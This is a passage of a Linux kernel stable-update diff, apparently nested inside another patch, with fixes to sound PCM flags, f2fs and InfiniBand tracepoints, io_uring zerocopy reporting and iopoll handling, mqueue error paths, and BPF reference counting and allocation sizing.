++			  struct sk_msg *msg, u32 bytes, int flags);
+ #endif /* CONFIG_NET_SOCK_MSG */
+ 
+ #if !defined(CONFIG_BPF_SYSCALL) || !defined(CONFIG_NET_SOCK_MSG)
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index 25ec8c181688d..eba23daf2c290 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -258,6 +258,7 @@ struct hda_codec {
+ 	unsigned int link_down_at_suspend:1; /* link down at runtime suspend */
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
++	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/pcm.h b/include/sound/pcm.h
+index 7b1a022910e8e..27040b472a4f6 100644
+--- a/include/sound/pcm.h
++++ b/include/sound/pcm.h
+@@ -106,24 +106,24 @@ struct snd_pcm_ops {
+ #define SNDRV_PCM_POS_XRUN		((snd_pcm_uframes_t)-1)
+ 
+ /* If you change this don't forget to change rates[] table in pcm_native.c */
+-#define SNDRV_PCM_RATE_5512		(1<<0)		/* 5512Hz */
+-#define SNDRV_PCM_RATE_8000		(1<<1)		/* 8000Hz */
+-#define SNDRV_PCM_RATE_11025		(1<<2)		/* 11025Hz */
+-#define SNDRV_PCM_RATE_16000		(1<<3)		/* 16000Hz */
+-#define SNDRV_PCM_RATE_22050		(1<<4)		/* 22050Hz */
+-#define SNDRV_PCM_RATE_32000		(1<<5)		/* 32000Hz */
+-#define SNDRV_PCM_RATE_44100		(1<<6)		/* 44100Hz */
+-#define SNDRV_PCM_RATE_48000		(1<<7)		/* 48000Hz */
+-#define SNDRV_PCM_RATE_64000		(1<<8)		/* 64000Hz */
+-#define SNDRV_PCM_RATE_88200		(1<<9)		/* 88200Hz */
+-#define SNDRV_PCM_RATE_96000		(1<<10)		/* 96000Hz */
+-#define SNDRV_PCM_RATE_176400		(1<<11)		/* 176400Hz */
+-#define SNDRV_PCM_RATE_192000		(1<<12)		/* 192000Hz */
+-#define SNDRV_PCM_RATE_352800		(1<<13)		/* 352800Hz */
+-#define SNDRV_PCM_RATE_384000		(1<<14)		/* 384000Hz */
+-
+-#define SNDRV_PCM_RATE_CONTINUOUS	(1<<30)		/* continuous range */
+-#define SNDRV_PCM_RATE_KNOT		(1<<31)		/* supports more non-continuos rates */
++#define SNDRV_PCM_RATE_5512		(1U<<0)		/* 5512Hz */
++#define SNDRV_PCM_RATE_8000		(1U<<1)		/* 8000Hz */
++#define SNDRV_PCM_RATE_11025		(1U<<2)		/* 11025Hz */
++#define SNDRV_PCM_RATE_16000		(1U<<3)		/* 16000Hz */
++#define SNDRV_PCM_RATE_22050		(1U<<4)		/* 22050Hz */
++#define SNDRV_PCM_RATE_32000		(1U<<5)		/* 32000Hz */
++#define SNDRV_PCM_RATE_44100		(1U<<6)		/* 44100Hz */
++#define SNDRV_PCM_RATE_48000		(1U<<7)		/* 48000Hz */
++#define SNDRV_PCM_RATE_64000		(1U<<8)		/* 64000Hz */
++#define SNDRV_PCM_RATE_88200		(1U<<9)		/* 88200Hz */
++#define SNDRV_PCM_RATE_96000		(1U<<10)	/* 96000Hz */
++#define SNDRV_PCM_RATE_176400		(1U<<11)	/* 176400Hz */
++#define SNDRV_PCM_RATE_192000		(1U<<12)	/* 192000Hz */
++#define SNDRV_PCM_RATE_352800		(1U<<13)	/* 352800Hz */
++#define SNDRV_PCM_RATE_384000		(1U<<14)	/* 384000Hz */
++
++#define SNDRV_PCM_RATE_CONTINUOUS	(1U<<30)	/* continuous range */
++#define SNDRV_PCM_RATE_KNOT		(1U<<31)	/* supports more non-continuous rates */
+ 
+ #define SNDRV_PCM_RATE_8000_44100	(SNDRV_PCM_RATE_8000|SNDRV_PCM_RATE_11025|\
+ 					 SNDRV_PCM_RATE_16000|SNDRV_PCM_RATE_22050|\
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index c6b372401c278..ff57e7f9914cc 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -322,7 +322,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		__field(ino_t,	ino)
+ 		__field(loff_t,	size)
+ 		__field(blkcnt_t, blocks)
+-		__field(const char *,	name)
++		__string(name,  dentry->d_name.name)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -330,7 +330,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		__entry->ino	= dir->i_ino;
+ 		__entry->size	= dir->i_size;
+ 		__entry->blocks	= dir->i_blocks;
+-		__entry->name	= dentry->d_name.name;
++		__assign_str(name, dentry->d_name.name);
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), dir ino = %lu, i_size = %lld, "
+@@ -338,7 +338,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		show_dev_ino(__entry),
+ 		__entry->size,
+ 		(unsigned long long)__entry->blocks,
+-		__entry->name)
++		__get_str(name))
+ );
+ 
+ DEFINE_EVENT(f2fs__inode_exit, f2fs_unlink_exit,
+@@ -940,25 +940,29 @@ TRACE_EVENT(f2fs_direct_IO_enter,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(struct kiocb *,	iocb)
++		__field(loff_t,	ki_pos)
++		__field(int,	ki_flags)
++		__field(u16,	ki_ioprio)
+ 		__field(unsigned long,	len)
+ 		__field(int,	rw)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__entry->dev	= inode->i_sb->s_dev;
+-		__entry->ino	= inode->i_ino;
+-		__entry->iocb	= iocb;
+-		__entry->len	= len;
+-		__entry->rw	= rw;
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->ki_pos		= iocb->ki_pos;
++		__entry->ki_flags	= iocb->ki_flags;
++		__entry->ki_ioprio	= iocb->ki_ioprio;
++		__entry->len		= len;
++		__entry->rw		= rw;
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), ino = %lu pos = %lld len = %lu ki_flags = %x ki_ioprio = %x rw = %d",
+ 		show_dev_ino(__entry),
+-		__entry->iocb->ki_pos,
++		__entry->ki_pos,
+ 		__entry->len,
+-		__entry->iocb->ki_flags,
+-		__entry->iocb->ki_ioprio,
++		__entry->ki_flags,
++		__entry->ki_ioprio,
+ 		__entry->rw)
+ );
+ 
+@@ -1407,19 +1411,19 @@ TRACE_EVENT(f2fs_write_checkpoint,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(int,	reason)
+-		__field(char *,	msg)
++		__string(dest_msg, msg)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev		= sb->s_dev;
+ 		__entry->reason		= reason;
+-		__entry->msg		= msg;
++		__assign_str(dest_msg, msg);
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), checkpoint for %s, state = %s",
+ 		show_dev(__entry->dev),
+ 		show_cpreason(__entry->reason),
+-		__entry->msg)
++		__get_str(dest_msg))
+ );
+ 
+ DECLARE_EVENT_CLASS(f2fs_discard,
+diff --git a/include/trace/events/ib_mad.h b/include/trace/events/ib_mad.h
+index 59363a083ecb9..d92691c78cff6 100644
+--- a/include/trace/events/ib_mad.h
++++ b/include/trace/events/ib_mad.h
+@@ -49,7 +49,6 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		__field(int,            retries_left)
+ 		__field(int,            max_retries)
+ 		__field(int,            retry)
+-		__field(u16,            pkey)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -89,7 +88,7 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		  "hdr : base_ver 0x%x class 0x%x class_ver 0x%x " \
+ 		  "method 0x%x status 0x%x class_specific 0x%x tid 0x%llx " \
+ 		  "attr_id 0x%x attr_mod 0x%x  => dlid 0x%08x sl %d "\
+-		  "pkey 0x%x rpqn 0x%x rqpkey 0x%x",
++		  "rpqn 0x%x rqpkey 0x%x",
+ 		__entry->dev_index, __entry->port_num, __entry->qp_num,
+ 		__entry->agent_priv, be64_to_cpu(__entry->wrtid),
+ 		__entry->retries_left, __entry->max_retries,
+@@ -100,7 +99,7 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		be16_to_cpu(__entry->class_specific),
+ 		be64_to_cpu(__entry->tid), be16_to_cpu(__entry->attr_id),
+ 		be32_to_cpu(__entry->attr_mod),
+-		be32_to_cpu(__entry->dlid), __entry->sl, __entry->pkey,
++		be32_to_cpu(__entry->dlid), __entry->sl,
+ 		__entry->rqpn, __entry->rqkey
+ 	)
+ );
+@@ -204,7 +203,6 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		__field(u16,            wc_status)
+ 		__field(u32,            slid)
+ 		__field(u32,            dev_index)
+-		__field(u16,            pkey)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -224,9 +222,6 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		__entry->slid = wc->slid;
+ 		__entry->src_qp = wc->src_qp;
+ 		__entry->sl = wc->sl;
+-		ib_query_pkey(qp_info->port_priv->device,
+-			      qp_info->port_priv->port_num,
+-			      wc->pkey_index, &__entry->pkey);
+ 		__entry->wc_status = wc->status;
+ 	),
+ 
+@@ -234,7 +229,7 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		  "base_ver 0x%02x class 0x%02x class_ver 0x%02x " \
+ 		  "method 0x%02x status 0x%04x class_specific 0x%04x " \
+ 		  "tid 0x%016llx attr_id 0x%04x attr_mod 0x%08x " \
+-		  "slid 0x%08x src QP%d, sl %d pkey 0x%04x",
++		  "slid 0x%08x src QP%d, sl %d",
+ 		__entry->dev_index, __entry->port_num, __entry->qp_num,
+ 		__entry->wc_status,
+ 		__entry->length,
+@@ -244,7 +239,7 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		be16_to_cpu(__entry->class_specific),
+ 		be64_to_cpu(__entry->tid), be16_to_cpu(__entry->attr_id),
+ 		be32_to_cpu(__entry->attr_mod),
+-		__entry->slid, __entry->src_qp, __entry->sl, __entry->pkey
++		__entry->slid, __entry->src_qp, __entry->sl
+ 	)
+ );
+ 
+diff --git a/include/uapi/linux/idxd.h b/include/uapi/linux/idxd.h
+index 2b9e7feba3f32..1d553bedbdb51 100644
+--- a/include/uapi/linux/idxd.h
++++ b/include/uapi/linux/idxd.h
+@@ -295,7 +295,7 @@ struct dsa_completion_record {
+ 		};
+ 
+ 		uint32_t	delta_rec_size;
+-		uint32_t	crc_val;
++		uint64_t	crc_val;
+ 
+ 		/* DIF check & strip */
+ 		struct {
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 2df3225b562fa..9d4c4078e8d00 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -296,10 +296,28 @@ enum io_uring_op {
+  *
+  * IORING_RECVSEND_FIXED_BUF	Use registered buffers, the index is stored in
+  *				the buf_index field.
++ *
++ * IORING_SEND_ZC_REPORT_USAGE
++ *				If set, SEND[MSG]_ZC should report
++ *				the zerocopy usage in cqe.res
++ *				for the IORING_CQE_F_NOTIF cqe.
++ *				0 is reported if zerocopy was actually possible.
++ *				IORING_NOTIF_USAGE_ZC_COPIED if data was copied
++ *				(at least partially).
+  */
+ #define IORING_RECVSEND_POLL_FIRST	(1U << 0)
+ #define IORING_RECV_MULTISHOT		(1U << 1)
+ #define IORING_RECVSEND_FIXED_BUF	(1U << 2)
++#define IORING_SEND_ZC_REPORT_USAGE	(1U << 3)
++
++/*
++ * cqe.res for IORING_CQE_F_NOTIF if
++ * IORING_SEND_ZC_REPORT_USAGE was requested
++ *
++ * It should be treated as a flag; all other
++ * bits of cqe.res should be treated as reserved!
++ */
++#define IORING_NOTIF_USAGE_ZC_COPIED    (1U << 31)
+ 
+ /*
+  * accept flags stored in sqe->ioprio
+diff --git a/include/uapi/linux/swab.h b/include/uapi/linux/swab.h
+index 0723a9cce747c..01717181339eb 100644
+--- a/include/uapi/linux/swab.h
++++ b/include/uapi/linux/swab.h
+@@ -3,7 +3,7 @@
+ #define _UAPI_LINUX_SWAB_H
+ 
+ #include <linux/types.h>
+-#include <linux/compiler.h>
++#include <linux/stddef.h>
+ #include <asm/bitsperlong.h>
+ #include <asm/swab.h>
+ 
+diff --git a/include/uapi/rdma/hns-abi.h b/include/uapi/rdma/hns-abi.h
+index f6fde06db4b4e..745790ce3c261 100644
+--- a/include/uapi/rdma/hns-abi.h
++++ b/include/uapi/rdma/hns-abi.h
+@@ -85,11 +85,26 @@ struct hns_roce_ib_create_qp_resp {
+ 	__aligned_u64 dwqe_mmap_key;
+ };
+ 
++enum {
++	HNS_ROCE_EXSGE_FLAGS = 1 << 0,
++};
++
++enum {
++	HNS_ROCE_RSP_EXSGE_FLAGS = 1 << 0,
++};
++
+ struct hns_roce_ib_alloc_ucontext_resp {
+ 	__u32	qp_tab_size;
+ 	__u32	cqe_size;
+ 	__u32	srq_tab_size;
+ 	__u32	reserved;
++	__u32	config;
++	__u32	max_inline_data;
++};
++
++struct hns_roce_ib_alloc_ucontext {
++	__u32 config;
++	__u32 reserved;
+ };
+ 
+ struct hns_roce_ib_alloc_pd_resp {
+diff --git a/include/uapi/sound/asequencer.h b/include/uapi/sound/asequencer.h
+index 6d4a2c60808dd..00d2703e8fca5 100644
+--- a/include/uapi/sound/asequencer.h
++++ b/include/uapi/sound/asequencer.h
+@@ -328,10 +328,10 @@ typedef int __bitwise snd_seq_client_type_t;
+ #define	KERNEL_CLIENT	((__force snd_seq_client_type_t) 2)
+                         
+ 	/* event filter flags */
+-#define SNDRV_SEQ_FILTER_BROADCAST	(1<<0)	/* accept broadcast messages */
+-#define SNDRV_SEQ_FILTER_MULTICAST	(1<<1)	/* accept multicast messages */
+-#define SNDRV_SEQ_FILTER_BOUNCE		(1<<2)	/* accept bounce event in error */
+-#define SNDRV_SEQ_FILTER_USE_EVENT	(1<<31)	/* use event filter */
++#define SNDRV_SEQ_FILTER_BROADCAST	(1U<<0)	/* accept broadcast messages */
++#define SNDRV_SEQ_FILTER_MULTICAST	(1U<<1)	/* accept multicast messages */
++#define SNDRV_SEQ_FILTER_BOUNCE		(1U<<2)	/* accept bounce event in error */
++#define SNDRV_SEQ_FILTER_USE_EVENT	(1U<<31)	/* use event filter */
+ 
+ struct snd_seq_client_info {
+ 	int client;			/* client number to inquire */
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 61cd7ffd0f6aa..17771cb3c3330 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1757,7 +1757,7 @@ static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags)
+ 		return ret;
+ 
+ 	/* If the op doesn't have a file, we're not polling for it */
+-	if ((req->ctx->flags & IORING_SETUP_IOPOLL) && req->file)
++	if ((req->ctx->flags & IORING_SETUP_IOPOLL) && def->iopoll_queue)
+ 		io_iopoll_req_issued(req, issue_flags);
+ 
+ 	return 0;
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 90d2fc6fd80e4..a49ccab262d53 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -164,12 +164,10 @@ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
+ 	}
+ 
+ done:
++	if (ret == -EAGAIN)
++		return -EAGAIN;
+ 	if (ret < 0)
+ 		req_set_fail(req);
+ 	io_req_set_res(req, ret, 0);
+-	/* put file to avoid an attempt to IOPOLL the req */
+-	if (!(req->flags & REQ_F_FIXED_FILE))
+-		io_put_file(req->file);
+-	req->file = NULL;
+ 	return IOU_OK;
+ }
+diff --git a/io_uring/net.c b/io_uring/net.c
+index ab83da7e80f04..bdd2b4e370b35 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -479,6 +479,7 @@ static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+ 	if (req->flags & REQ_F_BUFFER_SELECT) {
+ 		compat_ssize_t clen;
+ 
++		iomsg->free_iov = NULL;
+ 		if (msg.msg_iovlen == 0) {
+ 			sr->len = 0;
+ 		} else if (msg.msg_iovlen > 1) {
+@@ -805,10 +806,10 @@ retry_multishot:
+ 		goto retry_multishot;
+ 
+ 	if (mshot_finished) {
+-		io_netmsg_recycle(req, issue_flags);
+ 		/* fast path, check for non-NULL to avoid function call */
+ 		if (kmsg->free_iov)
+ 			kfree(kmsg->free_iov);
++		io_netmsg_recycle(req, issue_flags);
+ 		req->flags &= ~REQ_F_NEED_CLEANUP;
+ 	}
+ 
+@@ -937,7 +938,8 @@ int io_send_zc_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	zc->flags = READ_ONCE(sqe->ioprio);
+ 	if (zc->flags & ~(IORING_RECVSEND_POLL_FIRST |
+-			  IORING_RECVSEND_FIXED_BUF))
++			  IORING_RECVSEND_FIXED_BUF |
++			  IORING_SEND_ZC_REPORT_USAGE))
+ 		return -EINVAL;
+ 	notif = zc->notif = io_alloc_notif(ctx);
+ 	if (!notif)
+@@ -955,6 +957,9 @@ int io_send_zc_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		req->imu = READ_ONCE(ctx->user_bufs[idx]);
+ 		io_req_set_rsrc_node(notif, ctx, 0);
+ 	}
++	if (zc->flags & IORING_SEND_ZC_REPORT_USAGE) {
++		io_notif_to_data(notif)->zc_report = true;
++	}
+ 
+ 	if (req->opcode == IORING_OP_SEND_ZC) {
+ 		if (READ_ONCE(sqe->__pad3[0]))
+diff --git a/io_uring/notif.c b/io_uring/notif.c
+index e37c6569d82e8..4bfef10161fa0 100644
+--- a/io_uring/notif.c
++++ b/io_uring/notif.c
+@@ -18,6 +18,10 @@ static void __io_notif_complete_tw(struct io_kiocb *notif, bool *locked)
+ 		__io_unaccount_mem(ctx->user, nd->account_pages);
+ 		nd->account_pages = 0;
+ 	}
++
++	if (nd->zc_report && (nd->zc_copied || !nd->zc_used))
++		notif->cqe.res |= IORING_NOTIF_USAGE_ZC_COPIED;
++
+ 	io_req_task_complete(notif, locked);
+ }
+ 
+@@ -28,6 +32,13 @@ static void io_uring_tx_zerocopy_callback(struct sk_buff *skb,
+ 	struct io_notif_data *nd = container_of(uarg, struct io_notif_data, uarg);
+ 	struct io_kiocb *notif = cmd_to_io_kiocb(nd);
+ 
++	if (nd->zc_report) {
++		if (success && !nd->zc_used && skb)
++			WRITE_ONCE(nd->zc_used, true);
++		else if (!success && !nd->zc_copied)
++			WRITE_ONCE(nd->zc_copied, true);
++	}
++
+ 	if (refcount_dec_and_test(&uarg->refcnt)) {
+ 		notif->io_task_work.func = __io_notif_complete_tw;
+ 		io_req_task_work_add(notif);
+@@ -55,6 +66,7 @@ struct io_kiocb *io_alloc_notif(struct io_ring_ctx *ctx)
+ 	nd->account_pages = 0;
+ 	nd->uarg.flags = SKBFL_ZEROCOPY_FRAG | SKBFL_DONT_ORPHAN;
+ 	nd->uarg.callback = io_uring_tx_zerocopy_callback;
++	nd->zc_report = nd->zc_used = nd->zc_copied = false;
+ 	refcount_set(&nd->uarg.refcnt, 1);
+ 	return notif;
+ }
+diff --git a/io_uring/notif.h b/io_uring/notif.h
+index 5b4d710c8ca54..4ae696273c781 100644
+--- a/io_uring/notif.h
++++ b/io_uring/notif.h
+@@ -13,6 +13,9 @@ struct io_notif_data {
+ 	struct file		*file;
+ 	struct ubuf_info	uarg;
+ 	unsigned long		account_pages;
++	bool			zc_report;
++	bool			zc_used;
++	bool			zc_copied;
+ };
+ 
+ void io_notif_flush(struct io_kiocb *notif);
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 83dc0f9ad3b2f..04dd2c983fce4 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -63,6 +63,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READV",
+ 		.prep			= io_prep_rw,
+@@ -80,6 +81,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITEV",
+ 		.prep			= io_prep_rw,
+@@ -103,6 +105,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READ_FIXED",
+ 		.prep			= io_prep_rw,
+@@ -118,6 +121,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITE_FIXED",
+ 		.prep			= io_prep_rw,
+@@ -277,6 +281,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READ",
+ 		.prep			= io_prep_rw,
+@@ -292,6 +297,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITE",
+ 		.prep			= io_prep_rw,
+@@ -481,6 +487,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.plug			= 1,
+ 		.name			= "URING_CMD",
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= uring_cmd_pdu_size(1),
+ 		.prep			= io_uring_cmd_prep,
+ 		.issue			= io_uring_cmd,
+diff --git a/io_uring/opdef.h b/io_uring/opdef.h
+index 3efe06d25473a..df7e13d9bfba7 100644
+--- a/io_uring/opdef.h
++++ b/io_uring/opdef.h
+@@ -25,6 +25,8 @@ struct io_op_def {
+ 	unsigned		ioprio : 1;
+ 	/* supports iopoll */
+ 	unsigned		iopoll : 1;
++	/* have to be put into the iopoll list */
++	unsigned		iopoll_queue : 1;
+ 	/* opcode specific path will handle ->async_data allocation if needed */
+ 	unsigned		manual_alloc : 1;
+ 	/* size of async data needed, if any */
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index e8a8c20994805..06200fe73a044 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -72,10 +72,12 @@ static bool io_kill_timeout(struct io_kiocb *req, int status)
+ __cold void io_flush_timeouts(struct io_ring_ctx *ctx)
+ 	__must_hold(&ctx->completion_lock)
+ {
+-	u32 seq = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++	u32 seq;
+ 	struct io_timeout *timeout, *tmp;
+ 
+ 	spin_lock_irq(&ctx->timeout_lock);
++	seq = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++
+ 	list_for_each_entry_safe(timeout, tmp, &ctx->timeout_list, list) {
+ 		struct io_kiocb *req = cmd_to_io_kiocb(timeout);
+ 		u32 events_needed, events_got;
+diff --git a/ipc/mqueue.c b/ipc/mqueue.c
+index 467a194b8a2ec..d09aa1c1e3e65 100644
+--- a/ipc/mqueue.c
++++ b/ipc/mqueue.c
+@@ -1726,7 +1726,8 @@ static int __init init_mqueue_fs(void)
+ 
+ 	if (!setup_mq_sysctls(&init_ipc_ns)) {
+ 		pr_warn("sysctl registration failed\n");
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto out_kmem;
+ 	}
+ 
+ 	error = register_filesystem(&mqueue_fs_type);
+@@ -1744,8 +1745,9 @@ static int __init init_mqueue_fs(void)
+ out_filesystem:
+ 	unregister_filesystem(&mqueue_fs_type);
+ out_sysctl:
+-	kmem_cache_destroy(mqueue_inode_cachep);
+ 	retire_mq_sysctls(&init_ipc_ns);
++out_kmem:
++	kmem_cache_destroy(mqueue_inode_cachep);
+ 	return error;
+ }
+ 
+diff --git a/kernel/Makefile b/kernel/Makefile
+index d754e0be1176d..ebc692242b68b 100644
+--- a/kernel/Makefile
++++ b/kernel/Makefile
+@@ -41,9 +41,6 @@ UBSAN_SANITIZE_kcov.o := n
+ KMSAN_SANITIZE_kcov.o := n
+ CFLAGS_kcov.o := $(call cc-option, -fno-conserve-stack) -fno-stack-protector
+ 
+-# Don't instrument error handlers
+-CFLAGS_REMOVE_cfi.o := $(CC_FLAGS_CFI)
+-
+ obj-y += sched/
+ obj-y += locking/
+ obj-y += power/
+diff --git a/kernel/acct.c b/kernel/acct.c
+index 62200d799b9b0..034a26daabb2e 100644
+--- a/kernel/acct.c
++++ b/kernel/acct.c
+@@ -350,6 +350,8 @@ static comp_t encode_comp_t(unsigned long value)
+ 		exp++;
+ 	}
+ 
++	if (exp > (((comp_t) ~0U) >> MANTSIZE))
++		return (comp_t) ~0U;
+ 	/*
+ 	 * Clean it up and polish it off.
+ 	 */
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 35c07afac924e..efdbba2a0230e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4481,6 +4481,11 @@ static int btf_func_proto_check(struct btf_verifier_env *env,
+ 			break;
+ 		}
+ 
++		if (btf_type_is_resolve_source_only(arg_type)) {
++			btf_verifier_log_type(env, t, "Invalid arg#%u", i + 1);
++			return -EINVAL;
++		}
++
+ 		if (args[i].name_off &&
+ 		    (!btf_name_offset_valid(btf, args[i].name_off) ||
+ 		     !btf_name_valid_identifier(btf, args[i].name_off))) {
+diff --git a/kernel/bpf/cgroup_iter.c b/kernel/bpf/cgroup_iter.c
+index 9fcf09f2ef00f..c187a9e62bdbb 100644
+--- a/kernel/bpf/cgroup_iter.c
++++ b/kernel/bpf/cgroup_iter.c
+@@ -164,16 +164,30 @@ static int cgroup_iter_seq_init(void *priv, struct bpf_iter_aux_info *aux)
+ 	struct cgroup_iter_priv *p = (struct cgroup_iter_priv *)priv;
+ 	struct cgroup *cgrp = aux->cgroup.start;
+ 
++	/* bpf_iter_attach_cgroup() has already acquired an extra reference
++	 * for the start cgroup, but the reference may be released after
++	 * cgroup_iter_seq_init(), so acquire another reference for the
++	 * start cgroup.
++	 */
+ 	p->start_css = &cgrp->self;
++	css_get(p->start_css);
+ 	p->terminate = false;
+ 	p->visited_all = false;
+ 	p->order = aux->cgroup.order;
+ 	return 0;
+ }
+ 
++static void cgroup_iter_seq_fini(void *priv)
++{
++	struct cgroup_iter_priv *p = (struct cgroup_iter_priv *)priv;
++
++	css_put(p->start_css);
++}
++
+ static const struct bpf_iter_seq_info cgroup_iter_seq_info = {
+ 	.seq_ops		= &cgroup_iter_seq_ops,
+ 	.init_seq_private	= cgroup_iter_seq_init,
++	.fini_seq_private	= cgroup_iter_seq_fini,
+ 	.seq_priv_size		= sizeof(struct cgroup_iter_priv),
+ };
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 7b373a5e861f4..439ed7e5a82b8 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -3504,9 +3504,9 @@ static int bpf_prog_attach(const union bpf_attr *attr)
+ 	case BPF_PROG_TYPE_LSM:
+ 		if (ptype == BPF_PROG_TYPE_LSM &&
+ 		    prog->expected_attach_type != BPF_LSM_CGROUP)
+-			return -EINVAL;
+-
+-		ret = cgroup_bpf_prog_attach(attr, ptype, prog);
++			ret = -EINVAL;
++		else
++			ret = cgroup_bpf_prog_attach(attr, ptype, prog);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 264b3dc714cc4..242fe307032f1 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1008,9 +1008,9 @@ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t
+ 	if (unlikely(check_mul_overflow(n, size, &bytes)))
+ 		return NULL;
+ 
+-	if (ksize(dst) < bytes) {
++	if (ksize(dst) < ksize(src)) {
+ 		kfree(dst);
+-		dst = kmalloc_track_caller(bytes, flags);
++		dst = kmalloc_track_caller(kmalloc_size_roundup(bytes), flags);
+ 		if (!dst)
+ 			return NULL;
+ 	}
+@@ -1027,12 +1027,14 @@ out:
+  */
+ static void *realloc_array(void *arr, size_t old_n, size_t new_n, size_t size)
+ {
++	size_t alloc_size;
+ 	void *new_arr;
+ 
+ 	if (!new_n || old_n == new_n)
+ 		goto out;
+ 
+-	new_arr = krealloc_array(arr, new_n, size, GFP_KERNEL);
++	alloc_size = kmalloc_size_roundup(size_mul(new_n, size));
++	new_arr = krealloc(arr, alloc_size, GFP_KERNEL);
+ 	if (!new_arr) {
+ 		kfree(arr);
+ 		return NULL;
+@@ -2504,9 +2506,11 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ {
+ 	u32 cnt = cur->jmp_history_cnt;
+ 	struct bpf_idx_pair *p;
++	size_t alloc_size;
+ 
+ 	cnt++;
+-	p = krealloc(cur->jmp_history, cnt * sizeof(*p), GFP_USER);
++	alloc_size = kmalloc_size_roundup(size_mul(cnt, sizeof(*p)));
++	p = krealloc(cur->jmp_history, alloc_size, GFP_USER);
+ 	if (!p)
+ 		return -ENOMEM;
+ 	p[cnt - 1].idx = env->insn_idx;
